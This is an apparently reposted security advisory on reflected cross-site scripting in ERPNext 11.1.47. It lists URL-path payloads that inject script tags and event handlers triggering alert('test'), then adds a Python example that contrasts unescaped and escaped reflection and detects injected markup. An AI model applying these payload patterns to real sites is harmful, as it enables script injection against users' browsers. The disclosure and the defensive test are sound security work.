ERPNext 11.1.47 Cross Site Scripting

06 Jan 2020 00:00:00 | Reported by Daniel Bishtawi | Type: packetstorm | Source: packetstormsecurity.com

ERPNext 11.1.47 contains reflected cross-site scripting vulnerabilities on multiple pages; ERPNext has fixed them.

Code
`Information  
--------------------  
  
Advisory by Netsparker  
Name: Multiple Reflected Cross-site Scripting Vulnerabilities in ERPNext  
Affected Software: ERPNext  
Affected Versions: 11.1.47  
Vendor Homepage: https://erpnext.com/  
Vulnerability Type: Reflected Cross-site Scripting  
Severity: High  
Status: Fixed  
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-19-017  
  
Technical Details  
--------------------  
  
URL: http://{DOMAIN}/address/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
  
URL: http://{DOMAIN}/addresses/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
  
URL: http://{DOMAIN}/blog/"onload="alert(‘test’)" x  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : "alert(‘test’)" x  
  
URL: http://{DOMAIN}/contact/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
  
URL: http://{DOMAIN}/project/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
  
URL: http://{DOMAIN}/user/[email protected]  
"%20onmouseover=alert(‘test’)%20x="  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="  
  
URL: http://{DOMAIN}/api/method/x"%20onmouseover=alert(‘test’)%20x="  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="  
  
URL: http://{DOMAIN}/api/x"%20onmouseover=alert(‘test’)%20x="  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-19-017-cross-site-scripting-in-erpnext/  
`
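
The attack patterns listed above are carried in the URL path and rely on quote and angle-bracket characters reaching the response unescaped. The following is an added example, not ERPNext or Frappe code and not part of the advisory: it reflects a request path through a hypothetical template with and without `html.escape`, then parses the output to report any start tag or attribute the template did not define. `TEMPLATE`, the function names and the sample paths are constructed for illustration, and URL-decoding of the path before reflection is an assumption.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed request paths modelled on the advisory's URI-based patterns
# (ASCII quotes, {DOMAIN} omitted).
SAMPLE_PATHS = [
    "/address/'\"--></style></scRipt><scRipt>alert('test')</scRipt>",
    "/blog/\"onload=\"alert('test')\" x",
    "/api/method/x\"%20onmouseover=alert('test')%20x=\"",
]

# Hypothetical template: the path is reflected in an attribute and in body text.
TEMPLATE = '<div data-path="{0}"></div><p>Page {0} not found</p>'
# The only start tags (with attribute names) the template itself produces.
EXPECTED = {("div", ("data-path",)), ("p", ())}


def render_unsafe(path):
    """'Before': the decoded path is reflected verbatim."""
    return TEMPLATE.format(unquote(path))


def render_safe(path):
    """'After': escape &, <, > and both quote characters before reflecting."""
    return TEMPLATE.format(html.escape(unquote(path), quote=True))


class _StartTags(HTMLParser):
    """Records every start tag together with its sorted attribute names."""

    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, tuple(sorted(name for name, _ in attrs))))


def injected_markup(page):
    """Return start tags or attribute sets that the template did not define."""
    parser = _StartTags()
    parser.feed(page)
    parser.close()
    return [item for item in parser.seen if item not in EXPECTED]


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(p, injected_markup(render_unsafe(p)), injected_markup(render_safe(p)))
```

The same structural check can run as a regression test against any page that echoes the request path, since it fails whenever reflected input changes the set of tags or attributes in the response.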
